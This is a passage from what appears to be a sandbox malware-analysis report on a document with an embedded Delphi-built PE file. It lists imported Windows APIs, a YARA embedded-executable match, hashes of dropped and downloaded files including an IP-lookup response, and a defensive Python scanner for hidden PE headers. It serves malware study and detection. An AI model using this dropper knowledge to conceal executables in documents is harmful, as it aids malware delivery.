GlobalUnlock - 0x496298 0x96298 0x93298 0x0
GlobalReAlloc - 0x49629c 0x9629c 0x9329c 0x0
GlobalHandle - 0x4962a0 0x962a0 0x932a0 0x0
GlobalLock - 0x4962a4 0x962a4 0x932a4 0x0
GlobalFree - 0x4962a8 0x962a8 0x932a8 0x0
GlobalFindAtomA - 0x4962ac 0x962ac 0x932ac 0x0
GlobalDeleteAtom - 0x4962b0 0x962b0 0x932b0 0x0
GlobalAlloc - 0x4962b4 0x962b4 0x932b4 0x0
GlobalAddAtomA - 0x4962b8 0x962b8 0x932b8 0x0
GetVersionExA - 0x4962bc 0x962bc 0x932bc 0x0
GetVersion - 0x4962c0 0x962c0 0x932c0 0x0
GetTickCount - 0x4962c4 0x962c4 0x932c4 0x0
GetThreadLocale - 0x4962c8 0x962c8 0x932c8 0x0
GetSystemInfo - 0x4962cc 0x962cc 0x932cc 0x0
GetStringTypeExA - 0x4962d0 0x962d0 0x932d0 0x0
GetStdHandle - 0x4962d4 0x962d4 0x932d4 0x0
GetProcAddress - 0x4962d8 0x962d8 0x932d8 0x0
GetModuleHandleA - 0x4962dc 0x962dc 0x932dc 0x0
GetModuleFileNameA - 0x4962e0 0x962e0 0x932e0 0x0
GetLocaleInfoA - 0x4962e4 0x962e4 0x932e4 0x0
GetLocalTime - 0x4962e8 0x962e8 0x932e8 0x0
GetLastError - 0x4962ec 0x962ec 0x932ec 0x0
GetFullPathNameA - 0x4962f0 0x962f0 0x932f0 0x0
GetDiskFreeSpaceA - 0x4962f4 0x962f4 0x932f4 0x0
GetDateFormatA - 0x4962f8 0x962f8 0x932f8 0x0
GetCurrentThreadId - 0x4962fc 0x962fc 0x932fc 0x0
GetCurrentProcessId - 0x496300 0x96300 0x93300 0x0
GetCPInfo - 0x496304 0x96304 0x93304 0x0
GetACP - 0x496308 0x96308 0x93308 0x0
FreeResource - 0x49630c 0x9630c 0x9330c 0x0
InterlockedExchange - 0x496310 0x96310 0x93310 0x0
FreeLibrary - 0x496314 0x96314 0x93314 0x0
FormatMessageA - 0x496318 0x96318 0x93318 0x0
FindResourceA - 0x49631c 0x9631c 0x9331c 0x0
FindFirstFileA - 0x496320 0x96320 0x93320 0x0
FindClose - 0x496324 0x96324 0x93324 0x0
FileTimeToLocalFileTime - 0x496328 0x96328 0x93328 0x0
FileTimeToDosDateTime - 0x49632c 0x9632c 0x9332c 0x0
EnumCalendarInfoA - 0x496330 0x96330 0x93330 0x0
EnterCriticalSection - 0x496334 0x96334 0x93334 0x0
DeleteFileA - 0x496338 0x96338 0x93338 0x0
DeleteCriticalSection - 0x49633c 0x9633c 0x9333c 0x0
CreateThread - 0x496340 0x96340 0x93340 0x0
CreateFileA - 0x496344 0x96344 0x93344 0x0
CreateEventA - 0x496348 0x96348 0x93348 0x0
CompareStringA - 0x49634c 0x9634c 0x9334c 0x0
CloseHandle - 0x496350 0x96350 0x93350 0x0
version.dll (3)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
VerQueryValueA - 0x496358 0x96358 0x93358 0x0
GetFileVersionInfoSizeA - 0x49635c 0x9635c 0x9335c 0x0
GetFileVersionInfoA - 0x496360 0x96360 0x93360 0x0
gdi32.dll (70)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
UnrealizeObject - 0x496368 0x96368 0x93368 0x0
StretchBlt - 0x49636c 0x9636c 0x9336c 0x0
SetWindowOrgEx - 0x496370 0x96370 0x93370 0x0
SetWinMetaFileBits - 0x496374 0x96374 0x93374 0x0
SetViewportOrgEx - 0x496378 0x96378 0x93378 0x0
SetTextColor - 0x49637c 0x9637c 0x9337c 0x0
SetStretchBltMode - 0x496380 0x96380 0x93380 0x0
SetROP2 - 0x496384 0x96384 0x93384 0x0
SetPixel - 0x496388 0x96388 0x93388 0x0
SetEnhMetaFileBits - 0x49638c 0x9638c 0x9338c 0x0
SetDIBColorTable - 0x496390 0x96390 0x93390 0x0
SetBrushOrgEx - 0x496394 0x96394 0x93394 0x0
SetBkMode - 0x496398 0x96398 0x93398 0x0
SetBkColor - 0x49639c 0x9639c 0x9339c 0x0
SelectPalette - 0x4963a0 0x963a0 0x933a0 0x0
SelectObject - 0x4963a4 0x963a4 0x933a4 0x0
SaveDC - 0x4963a8 0x963a8 0x933a8 0x0
RestoreDC - 0x4963ac 0x963ac 0x933ac 0x0
Rectangle - 0x4963b0 0x963b0 0x933b0 0x0
RectVisible - 0x4963b4 0x963b4 0x933b4 0x0
RealizePalette - 0x4963b8 0x963b8 0x933b8 0x0
Polyline - 0x4963bc 0x963bc 0x933bc 0x0
Polygon - 0x4963c0 0x963c0 0x933c0 0x0
PlayEnhMetaFile - 0x4963c4 0x963c4 0x933c4 0x0
PatBlt - 0x4963c8 0x963c8 0x933c8 0x0
MoveToEx - 0x4963cc 0x963cc 0x933cc 0x0
MaskBlt - 0x4963d0 0x963d0 0x933d0 0x0
LineTo - 0x4963d4 0x963d4 0x933d4 0x0
IntersectClipRect - 0x4963d8 0x963d8 0x933d8 0x0
GetWindowOrgEx - 0x4963dc 0x963dc 0x933dc 0x0
GetWinMetaFileBits - 0x4963e0 0x963e0 0x933e0 0x0
GetTextMetricsA - 0x4963e4 0x963e4 0x933e4 0x0
GetTextExtentPointA - 0x4963e8 0x963e8 0x933e8 0x0
GetTextExtentPoint32A - 0x4963ec 0x963ec 0x933ec 0x0
GetSystemPaletteEntries - 0x4963f0 0x963f0 0x933f0 0x0
GetStockObject - 0x4963f4 0x963f4 0x933f4 0x0
GetPixel - 0x4963f8 0x963f8 0x933f8 0x0
GetPaletteEntries - 0x4963fc 0x963fc 0x933fc 0x0
GetObjectA - 0x496400 0x96400 0x93400 0x0
GetEnhMetaFilePaletteEntries - 0x496404 0x96404 0x93404 0x0
GetEnhMetaFileHeader - 0x496408 0x96408 0x93408 0x0
GetEnhMetaFileBits - 0x49640c 0x9640c 0x9340c 0x0
GetEnhMetaFileW - 0x496410 0x96410 0x93410 0x0
GetDeviceCaps - 0x496414 0x96414 0x93414 0x0
GetDIBits - 0x496418 0x96418 0x93418 0x0
GetDIBColorTable - 0x49641c 0x9641c 0x9341c 0x0
GetDCOrgEx - 0x496420 0x96420 0x93420 0x0
GetCurrentPositionEx - 0x496424 0x96424 0x93424 0x0
GetClipBox - 0x496428 0x96428 0x93428 0x0
GetBrushOrgEx - 0x49642c 0x9642c 0x9342c 0x0
GetBitmapBits - 0x496430 0x96430 0x93430 0x0
GdiFlush - 0x496434 0x96434 0x93434 0x0
ExcludeClipRect - 0x496438 0x96438 0x93438 0x0
DeleteObject - 0x49643c 0x9643c 0x9343c 0x0
DeleteEnhMetaFile - 0x496440 0x96440 0x93440 0x0
DeleteDC - 0x496444 0x96444 0x93444 0x0
CreateSolidBrush - 0x496448 0x96448 0x93448 0x0
CreatePenIndirect - 0x49644c 0x9644c 0x9344c 0x0
CreatePalette - 0x496450 0x96450 0x93450 0x0
CreateHalftonePalette - 0x496454 0x96454 0x93454 0x0
CreateFontIndirectA - 0x496458 0x96458 0x93458 0x0
CreateDIBitmap - 0x49645c 0x9645c 0x9345c 0x0
CreateDIBSection - 0x496460 0x96460 0x93460 0x0
CreateCompatibleDC - 0x496464 0x96464 0x93464 0x0
CreateCompatibleBitmap - 0x496468 0x96468 0x93468 0x0
CreateBrushIndirect - 0x49646c 0x9646c 0x9346c 0x0
CreateBitmap - 0x496470 0x96470 0x93470 0x0
CopyEnhMetaFileA - 0x496474 0x96474 0x93474 0x0
BitBlt - 0x496478 0x96478 0x93478 0x0
AddFontResourceA - 0x49647c 0x9647c 0x9347c 0x0
user32.dll (168)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CreateWindowExA - 0x496484 0x96484 0x93484 0x0
WindowFromPoint - 0x496488 0x96488 0x93488 0x0
WinHelpA - 0x49648c 0x9648c 0x9348c 0x0
WaitMessage - 0x496490 0x96490 0x93490 0x0
UpdateWindow - 0x496494 0x96494 0x93494 0x0
UnregisterClassA - 0x496498 0x96498 0x93498 0x0
UnhookWindowsHookEx - 0x49649c 0x9649c 0x9349c 0x0
TranslateMessage - 0x4964a0 0x964a0 0x934a0 0x0
TranslateMDISysAccel - 0x4964a4 0x964a4 0x934a4 0x0
TrackPopupMenu - 0x4964a8 0x964a8 0x934a8 0x0
SystemParametersInfoA - 0x4964ac 0x964ac 0x934ac 0x0
ShowWindow - 0x4964b0 0x964b0 0x934b0 0x0
ShowScrollBar - 0x4964b4 0x964b4 0x934b4 0x0
ShowOwnedPopups - 0x4964b8 0x964b8 0x934b8 0x0
ShowCursor - 0x4964bc 0x964bc 0x934bc 0x0
ShowCaret - 0x4964c0 0x964c0 0x934c0 0x0
SetWindowsHookExA - 0x4964c4 0x964c4 0x934c4 0x0
SetWindowTextA - 0x4964c8 0x964c8 0x934c8 0x0
SetWindowPos - 0x4964cc 0x964cc 0x934cc 0x0
SetWindowPlacement - 0x4964d0 0x964d0 0x934d0 0x0
SetWindowLongA - 0x4964d4 0x964d4 0x934d4 0x0
SetTimer - 0x4964d8 0x964d8 0x934d8 0x0
SetScrollRange - 0x4964dc 0x964dc 0x934dc 0x0
SetScrollPos - 0x4964e0 0x964e0 0x934e0 0x0
SetScrollInfo - 0x4964e4 0x964e4 0x934e4 0x0
SetRect - 0x4964e8 0x964e8 0x934e8 0x0
SetPropA - 0x4964ec 0x964ec 0x934ec 0x0
SetParent - 0x4964f0 0x964f0 0x934f0 0x0
SetMenuItemInfoA - 0x4964f4 0x964f4 0x934f4 0x0
SetMenu - 0x4964f8 0x964f8 0x934f8 0x0
SetForegroundWindow - 0x4964fc 0x964fc 0x934fc 0x0
SetFocus - 0x496500 0x96500 0x93500 0x0
SetCursor - 0x496504 0x96504 0x93504 0x0
SetClipboardData - 0x496508 0x96508 0x93508 0x0
SetClassLongA - 0x49650c 0x9650c 0x9350c 0x0
SetCapture - 0x496510 0x96510 0x93510 0x0
SetActiveWindow - 0x496514 0x96514 0x93514 0x0
SendMessageA - 0x496518 0x96518 0x93518 0x0
ScrollWindow - 0x49651c 0x9651c 0x9351c 0x0
ScreenToClient - 0x496520 0x96520 0x93520 0x0
RemovePropA - 0x496524 0x96524 0x93524 0x0
RemoveMenu - 0x496528 0x96528 0x93528 0x0
ReleaseDC - 0x49652c 0x9652c 0x9352c 0x0
ReleaseCapture - 0x496530 0x96530 0x93530 0x0
RegisterWindowMessageA - 0x496534 0x96534 0x93534 0x0
RegisterClipboardFormatA - 0x496538 0x96538 0x93538 0x0
RegisterClassA - 0x49653c 0x9653c 0x9353c 0x0
RedrawWindow - 0x496540 0x96540 0x93540 0x0
PtInRect - 0x496544 0x96544 0x93544 0x0
PostQuitMessage - 0x496548 0x96548 0x93548 0x0
PostMessageA - 0x49654c 0x9654c 0x9354c 0x0
PeekMessageA - 0x496550 0x96550 0x93550 0x0
OpenClipboard - 0x496554 0x96554 0x93554 0x0
OffsetRect - 0x496558 0x96558 0x93558 0x0
OemToCharA - 0x49655c 0x9655c 0x9355c 0x0
MessageBoxA - 0x496560 0x96560 0x93560 0x0
MessageBeep - 0x496564 0x96564 0x93564 0x0
MapWindowPoints - 0x496568 0x96568 0x93568 0x0
MapVirtualKeyA - 0x49656c 0x9656c 0x9356c 0x0
LoadStringA - 0x496570 0x96570 0x93570 0x0
LoadKeyboardLayoutA - 0x496574 0x96574 0x93574 0x0
LoadIconA - 0x496578 0x96578 0x93578 0x0
LoadCursorW - 0x49657c 0x9657c 0x9357c 0x0
LoadCursorA - 0x496580 0x96580 0x93580 0x0
LoadBitmapA - 0x496584 0x96584 0x93584 0x0
KillTimer - 0x496588 0x96588 0x93588 0x0
IsZoomed - 0x49658c 0x9658c 0x9358c 0x0
IsWindowVisible - 0x496590 0x96590 0x93590 0x0
IsWindowEnabled - 0x496594 0x96594 0x93594 0x0
IsWindow - 0x496598 0x96598 0x93598 0x0
IsRectEmpty - 0x49659c 0x9659c 0x9359c 0x0
IsIconic - 0x4965a0 0x965a0 0x935a0 0x0
IsDialogMessageA - 0x4965a4 0x965a4 0x935a4 0x0
IsChild - 0x4965a8 0x965a8 0x935a8 0x0
InvalidateRect - 0x4965ac 0x965ac 0x935ac 0x0
IntersectRect - 0x4965b0 0x965b0 0x935b0 0x0
InsertMenuItemA - 0x4965b4 0x965b4 0x935b4 0x0
InsertMenuA - 0x4965b8 0x965b8 0x935b8 0x0
InflateRect - 0x4965bc 0x965bc 0x935bc 0x0
HideCaret - 0x4965c0 0x965c0 0x935c0 0x0
GetWindowThreadProcessId - 0x4965c4 0x965c4 0x935c4 0x0
GetWindowTextA - 0x4965c8 0x965c8 0x935c8 0x0
GetWindowRect - 0x4965cc 0x965cc 0x935cc 0x0
GetWindowPlacement - 0x4965d0 0x965d0 0x935d0 0x0
GetWindowLongA - 0x4965d4 0x965d4 0x935d4 0x0
GetWindowDC - 0x4965d8 0x965d8 0x935d8 0x0
GetTopWindow - 0x4965dc 0x965dc 0x935dc 0x0
GetSystemMetrics - 0x4965e0 0x965e0 0x935e0 0x0
GetSystemMenu - 0x4965e4 0x965e4 0x935e4 0x0
GetSysColorBrush - 0x4965e8 0x965e8 0x935e8 0x0
GetSysColor - 0x4965ec 0x965ec 0x935ec 0x0
GetSubMenu - 0x4965f0 0x965f0 0x935f0 0x0
GetScrollRange - 0x4965f4 0x965f4 0x935f4 0x0
GetScrollPos - 0x4965f8 0x965f8 0x935f8 0x0
GetScrollInfo - 0x4965fc 0x965fc 0x935fc 0x0
GetPropA - 0x496600 0x96600 0x93600 0x0
GetParent - 0x496604 0x96604 0x93604 0x0
GetWindow - 0x496608 0x96608 0x93608 0x0
GetMenuStringA - 0x49660c 0x9660c 0x9360c 0x0
GetMenuState - 0x496610 0x96610 0x93610 0x0
GetMenuItemInfoA - 0x496614 0x96614 0x93614 0x0
GetMenuItemID - 0x496618 0x96618 0x93618 0x0
GetMenuItemCount - 0x49661c 0x9661c 0x9361c 0x0
GetMenu - 0x496620 0x96620 0x93620 0x0
GetLastActivePopup - 0x496624 0x96624 0x93624 0x0
GetKeyboardState - 0x496628 0x96628 0x93628 0x0
GetKeyboardLayoutList - 0x49662c 0x9662c 0x9362c 0x0
GetKeyboardLayout - 0x496630 0x96630 0x93630 0x0
GetKeyState - 0x496634 0x96634 0x93634 0x0
GetKeyNameTextA - 0x496638 0x96638 0x93638 0x0
GetIconInfo - 0x49663c 0x9663c 0x9363c 0x0
GetForegroundWindow - 0x496640 0x96640 0x93640 0x0
GetFocus - 0x496644 0x96644 0x93644 0x0
GetDesktopWindow - 0x496648 0x96648 0x93648 0x0
GetDCEx - 0x49664c 0x9664c 0x9364c 0x0
GetDC - 0x496650 0x96650 0x93650 0x0
GetCursorPos - 0x496654 0x96654 0x93654 0x0
GetCursor - 0x496658 0x96658 0x93658 0x0
GetClipboardData - 0x49665c 0x9665c 0x9365c 0x0
GetClientRect - 0x496660 0x96660 0x93660 0x0
GetClassNameA - 0x496664 0x96664 0x93664 0x0
GetClassInfoA - 0x496668 0x96668 0x93668 0x0
GetCapture - 0x49666c 0x9666c 0x9366c 0x0
GetAsyncKeyState - 0x496670 0x96670 0x93670 0x0
GetActiveWindow - 0x496674 0x96674 0x93674 0x0
FrameRect - 0x496678 0x96678 0x93678 0x0
FindWindowA - 0x49667c 0x9667c 0x9367c 0x0
FillRect - 0x496680 0x96680 0x93680 0x0
EqualRect - 0x496684 0x96684 0x93684 0x0
EnumWindows - 0x496688 0x96688 0x93688 0x0
EnumThreadWindows - 0x49668c 0x9668c 0x9368c 0x0
EndPaint - 0x496690 0x96690 0x93690 0x0
EnableWindow - 0x496694 0x96694 0x93694 0x0
EnableScrollBar - 0x496698 0x96698 0x93698 0x0
EnableMenuItem - 0x49669c 0x9669c 0x9369c 0x0
EmptyClipboard - 0x4966a0 0x966a0 0x936a0 0x0
DrawTextA - 0x4966a4 0x966a4 0x936a4 0x0
DrawStateA - 0x4966a8 0x966a8 0x936a8 0x0
DrawMenuBar - 0x4966ac 0x966ac 0x936ac 0x0
DrawIconEx - 0x4966b0 0x966b0 0x936b0 0x0
DrawIcon - 0x4966b4 0x966b4 0x936b4 0x0
DrawFrameControl - 0x4966b8 0x966b8 0x936b8 0x0
DrawEdge - 0x4966bc 0x966bc 0x936bc 0x0
DispatchMessageA - 0x4966c0 0x966c0 0x936c0 0x0
DestroyWindow - 0x4966c4 0x966c4 0x936c4 0x0
DestroyMenu - 0x4966c8 0x966c8 0x936c8 0x0
DestroyIcon - 0x4966cc 0x966cc 0x936cc 0x0
DestroyCursor - 0x4966d0 0x966d0 0x936d0 0x0
DeleteMenu - 0x4966d4 0x966d4 0x936d4 0x0
DefWindowProcA - 0x4966d8 0x966d8 0x936d8 0x0
DefMDIChildProcA - 0x4966dc 0x966dc 0x936dc 0x0
DefFrameProcA - 0x4966e0 0x966e0 0x936e0 0x0
CreatePopupMenu - 0x4966e4 0x966e4 0x936e4 0x0
CreateMenu - 0x4966e8 0x966e8 0x936e8 0x0
CreateIcon - 0x4966ec 0x966ec 0x936ec 0x0
CloseClipboard - 0x4966f0 0x966f0 0x936f0 0x0
ClientToScreen - 0x4966f4 0x966f4 0x936f4 0x0
CheckMenuItem - 0x4966f8 0x966f8 0x936f8 0x0
CallWindowProcA - 0x4966fc 0x966fc 0x936fc 0x0
CallNextHookEx - 0x496700 0x96700 0x93700 0x0
BeginPaint - 0x496704 0x96704 0x93704 0x0
CharNextA - 0x496708 0x96708 0x93708 0x0
CharLowerBuffA - 0x49670c 0x9670c 0x9370c 0x0
CharLowerA - 0x496710 0x96710 0x93710 0x0
CharUpperBuffA - 0x496714 0x96714 0x93714 0x0
CharToOemA - 0x496718 0x96718 0x93718 0x0
AdjustWindowRectEx - 0x49671c 0x9671c 0x9371c 0x0
ActivateKeyboardLayout - 0x496720 0x96720 0x93720 0x0
kernel32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
Sleep - 0x496728 0x96728 0x93728 0x0
oleaut32.dll (13)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SafeArrayPtrOfIndex - 0x496730 0x96730 0x93730 0x0
SafeArrayPutElement - 0x496734 0x96734 0x93734 0x0
SafeArrayGetElement - 0x496738 0x96738 0x93738 0x0
SafeArrayUnaccessData - 0x49673c 0x9673c 0x9373c 0x0
SafeArrayAccessData - 0x496740 0x96740 0x93740 0x0
SafeArrayGetUBound - 0x496744 0x96744 0x93744 0x0
SafeArrayGetLBound - 0x496748 0x96748 0x93748 0x0
SafeArrayCreate - 0x49674c 0x9674c 0x9374c 0x0
VariantChangeType - 0x496750 0x96750 0x93750 0x0
VariantCopyInd - 0x496754 0x96754 0x93754 0x0
VariantCopy - 0x496758 0x96758 0x93758 0x0
VariantClear - 0x49675c 0x9675c 0x9375c 0x0
VariantInit - 0x496760 0x96760 0x93760 0x0
ole32.dll (4)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CoTaskMemAlloc - 0x496768 0x96768 0x93768 0x0
CoCreateInstance - 0x49676c 0x9676c 0x9376c 0x0
CoUninitialize - 0x496770 0x96770 0x93770 0x0
CoInitialize - 0x496774 0x96774 0x93774 0x0
oleaut32.dll (4)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CreateErrorInfo - 0x49677c 0x9677c 0x9377c 0x0
GetErrorInfo - 0x496780 0x96780 0x93780 0x0
SetErrorInfo - 0x496784 0x96784 0x93784 0x0
SysFreeString - 0x496788 0x96788 0x93788 0x0
comctl32.dll (24)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
ImageList_SetIconSize - 0x496790 0x96790 0x93790 0x0
ImageList_GetIconSize - 0x496794 0x96794 0x93794 0x0
ImageList_Write - 0x496798 0x96798 0x93798 0x0
ImageList_Read - 0x49679c 0x9679c 0x9379c 0x0
ImageList_GetDragImage - 0x4967a0 0x967a0 0x937a0 0x0
ImageList_DragShowNolock - 0x4967a4 0x967a4 0x937a4 0x0
ImageList_SetDragCursorImage - 0x4967a8 0x967a8 0x937a8 0x0
ImageList_DragMove - 0x4967ac 0x967ac 0x937ac 0x0
ImageList_DragLeave - 0x4967b0 0x967b0 0x937b0 0x0
ImageList_DragEnter - 0x4967b4 0x967b4 0x937b4 0x0
ImageList_EndDrag - 0x4967b8 0x967b8 0x937b8 0x0
ImageList_BeginDrag - 0x4967bc 0x967bc 0x937bc 0x0
ImageList_Remove - 0x4967c0 0x967c0 0x937c0 0x0
ImageList_DrawEx - 0x4967c4 0x967c4 0x937c4 0x0
ImageList_Replace - 0x4967c8 0x967c8 0x937c8 0x0
ImageList_Draw - 0x4967cc 0x967cc 0x937cc 0x0
ImageList_GetBkColor - 0x4967d0 0x967d0 0x937d0 0x0
ImageList_SetBkColor - 0x4967d4 0x967d4 0x937d4 0x0
ImageList_ReplaceIcon - 0x4967d8 0x967d8 0x937d8 0x0
ImageList_Add - 0x4967dc 0x967dc 0x937dc 0x0
ImageList_GetImageCount - 0x4967e0 0x967e0 0x937e0 0x0
ImageList_Destroy - 0x4967e4 0x967e4 0x937e4 0x0
ImageList_Create - 0x4967e8 0x967e8 0x937e8 0x0
InitCommonControls - 0x4967ec 0x967ec 0x937ec 0x0
winmm.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
sndPlaySoundA - 0x4967f4 0x967f4 0x937f4 0x0
YARA Matches (1)
Rule Name Rule Description Classification Score Actions
Document_Contains_Embedded_PE_File PE file inside a document; possible malware dropper - 3/5
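The YARA hit above says a PE image sits inside the document; the embedded file's own header fields above (sections named CODE/DATA/BSS, a compile timestamp of 1992-06-19 22:22:17) are the fixed values the Borland/Delphi linker writes, so that timestamp is a toolchain marker, not a build date. The scanner below is an added example, not VMRay's rule and not the YARA rule's source: it does by hand what a rule like that checks, but with a stricter test than "the bytes MZ occur", since `MZ` appears in ordinary text. A candidate counts only if `e_lfanew` points inside the buffer at a `PE\0\0` signature, the COFF machine field is a known value and the section count is sane; it then reads the section names and flags the Borland timestamp. The sample blob it scans is constructed inline (an OLE magic prefix, a decoy `MZ` string, then a synthetic header built by `build_fake_pe`), so it runs offline.

```python
"""Find embedded PE images in a blob by validating the MZ/PE header pair.

Added example (not VMRay's code or YARA rule). The sample input is
constructed by build_fake_pe(); it is a header only, not a runnable image.
"""
import struct
from datetime import datetime, timezone

PE_SIG = b"PE\0\0"
# Fixed TimeDateStamp written by Borland/Delphi linkers (1992-06-19 22:22:17 UTC).
BORLAND_STAMP = int(datetime(1992, 6, 19, 22, 22, 17, tzinfo=timezone.utc).timestamp())
MACHINES = {0x14C: "i386", 0x8664: "x86-64", 0x1C0: "ARM", 0xAA64: "ARM64"}
IMAGE_FILE_DLL = 0x2000


def find_embedded_pe(blob: bytes):
    """Return one dict per plausible PE header found anywhere in blob."""
    hits = []
    pos = blob.find(b"MZ")
    while pos != -1:
        hdr = parse_pe_at(blob, pos)
        if hdr:
            hits.append(hdr)
        pos = blob.find(b"MZ", pos + 1)
    return hits


def parse_pe_at(blob: bytes, mz_off: int):
    """Validate an MZ/PE pair at mz_off; return parsed COFF fields or None."""
    if mz_off + 0x40 > len(blob):          # need the full DOS header for e_lfanew
        return None
    (e_lfanew,) = struct.unpack_from("<I", blob, mz_off + 0x3C)
    pe_off = mz_off + e_lfanew
    # e_lfanew must land inside the buffer with room for signature + 20-byte COFF header.
    if e_lfanew < 0x40 or pe_off + 24 > len(blob):
        return None
    if blob[pe_off:pe_off + 4] != PE_SIG:
        return None
    machine, nsections, stamp, _symtab, _nsyms, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", blob, pe_off + 4)
    if machine not in MACHINES or nsections == 0 or nsections > 96:
        return None
    sections = []
    sec_off = pe_off + 24 + opt_size       # section table follows the optional header
    for i in range(nsections):
        off = sec_off + i * 40
        if off + 40 > len(blob):
            break
        sections.append(blob[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return {
        "offset": mz_off,
        "machine": MACHINES[machine],
        "sections": sections,
        "timestamp": datetime.fromtimestamp(stamp, tz=timezone.utc).isoformat(),
        "borland_fixed_stamp": stamp == BORLAND_STAMP,
        "is_dll": bool(chars & IMAGE_FILE_DLL),
    }


def build_fake_pe(stamp: int, section_names, is_dll=False) -> bytes:
    """Construct a minimal MZ + PE + COFF + section-table header for testing."""
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew = 0x40
    chars = IMAGE_FILE_DLL if is_dll else 0x0102        # DLL, or EXE | 32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), stamp, 0, 0, 0, chars)
    secs = b"".join(n.encode().ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return bytes(dos) + PE_SIG + coff + secs


def constructed_sample() -> bytes:
    """OLE magic, a decoy 'MZ' inside text, then a Borland-stamped six-section DLL."""
    return (b"\xd0\xcf\x11\xe0" + b"\0" * 64 + b"MZ is not a header" + b"\0" * 32
            + build_fake_pe(BORLAND_STAMP,
                            ["CODE", "DATA", "BSS", ".idata", ".reloc", ".rsrc"],
                            is_dll=True))


if __name__ == "__main__":
    for hit in find_embedded_pe(constructed_sample()):
        print(hit)
```

Run against a real OLE document the scan is the same call on the file's bytes; for the document in this report it should produce exactly one hit whose section list and timestamp match the PE Information above. The decoy in the constructed sample is rejected because its `e_lfanew` reads as zero, which is the false positive a bare `MZ` string match would have produced.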
c:\users\keecfmwgj\appdata\local\gdipfontcachev1.dat Dropped File Stream
clean
MIME Type application/octet-stream
File Size 8.03 KB
MD5 3b124f39977734e519b4d76da3fd1429
SHA1 93258edf50199af514b466e27af94b44f9eee8a7
SHA256 790a6af00576b6ee07663cf571a92e5b72379c9d24f3599af1fa9fec8aeb168a
SSDeep 3:5tmlNlPlcy:5tm/
ImpHash -
c:\netlogon Dropped File Unknown
clean
MIME Type -
File Size 0 Bytes
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep 3::
ImpHash -
c:\users\keecfmwgj\appdata\local\gdipfontcachev1.dat Dropped File Stream
clean
MIME Type application/octet-stream
File Size 108.45 KB
MD5 f7bdd5d34bc87760ee6515dced6538b1
SHA1 77264ff34c95f5c9ab97568e9c0a5b48b84787cb
SHA256 9f0327fb7d2b24169685dc794022dcb42f351a2c277c0c6360810c268196ac67
SSDeep 1536:DPmuvYHgTlll9+byxrgoEviK4uf3xqOYZ:bmCl9+mxrA9sOY
ImpHash -
C:\ProgramData\kaosdma.txt Downloaded File Text
clean
Also Known As c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\api_ipify_org[1].txt (Downloaded File)
Parent File analysis.pcap
MIME Type text/plain
File Size 12 Bytes
MD5 5f61ad2e35e8d07aacb241664824725e
SHA1 610a4f50b05d5f664c5cc47b6b3b86ca6cb4ced1
SHA256 fd41cd2f48623ceb8d6d4fa774c80efa5c3f22c94bfd7a7c59543772b585d9a1
SSDeep 3:gRtWu:g73
ImpHash -
0f0408e2350bcecbe61c16cb9f083f1db2cca75be4e5f5b00be7aba408407662 Downloaded File Text
clean
Parent File analysis.pcap
MIME Type text/plain
File Size 121 Bytes
MD5 3eea1302b226620ee1f985831c585d1a
SHA1 9d88d1c51627c98800617bd6e51375dfba2e9991
SHA256 0f0408e2350bcecbe61c16cb9f083f1db2cca75be4e5f5b00be7aba408407662
SSDeep 3:RwQWcCMEmDXcVULrjqYlFx63Fq3jM89xYu7WM61dUD/r+WM:nWBM9cVXiA+w8T17z6jag
ImpHash -
ca6b8165af0d6032dabc2a818b5c08eeca3d29ed612e0deb88a64e58bae47a86 Downloaded File Text
clean
Parent File analysis.pcap
MIME Type text/plain
File Size 52 Bytes
MD5 03970f4ee8f2d09b01179674d140ea5f
SHA1 9b6ba03f44bc470a7c22f705269b0a6e4efc8486
SHA256 ca6b8165af0d6032dabc2a818b5c08eeca3d29ed612e0deb88a64e58bae47a86
SSDeep 3:1UNsRdOOLmpS0tQOkSGYn:1UiOOS80tPbGY
ImpHash -
8bc8e15ebd0428201a59b41612a9da6284ace3847cae6d0711a23a176c11cbf1 Downloaded File Text
clean
Parent File analysis.pcap
MIME Type text/plain
File Size 12 Bytes
MD5 56543620b2894e9e0143b98a00af4f6e
SHA1 a194582bc819c176962749e1174a9a97f3a8238f
SHA256 8bc8e15ebd0428201a59b41612a9da6284ace3847cae6d0711a23a176c11cbf1
SSDeep 3:9/+UnS1:9/ZM
ImpHash -
dbf3eff77c45528798443b7335e45ae229f3036db4081551e1cf8456a074ac72 Downloaded File Text
clean
Parent File analysis.pcap
MIME Type text/plain
File Size 12 Bytes
MD5 61b3b975dedabc8c6558eb27196b70f7
SHA1 32fed066ac9a139e4a16979d4ebbc0e5aef1d2e0
SHA256 dbf3eff77c45528798443b7335e45ae229f3036db4081551e1cf8456a074ac72
SSDeep 3:gHd1:gz
ImpHash -
fdf73d5b987ef1e4a58ecee1e654161ecac8dc2f61d6f9f4fd3d17dd838ca89a Downloaded File Text
clean
Parent File analysis.pcap
MIME Type text/plain
File Size 12 Bytes
MD5 ebd55966c93202038455fc78b710f5e9
SHA1 8b4ee82ce292ab294d2cf15ebf3bcbe7f1474da4
SHA256 fdf73d5b987ef1e4a58ecee1e654161ecac8dc2f61d6f9f4fd3d17dd838ca89a
SSDeep 3:I3kS1:KkM
ImpHash -
bc8b832fd2a68c177d4f5ecee42000ae6255a8445a53c6f1a4d3817226df73a2 Downloaded File Text
clean
Parent File analysis.pcap
MIME Type text/plain
File Size 12 Bytes
MD5 d50283f0de76717feacd6d796a2fc5cc
SHA1 94c700fb65c6965a48f253e767a69de615d34153
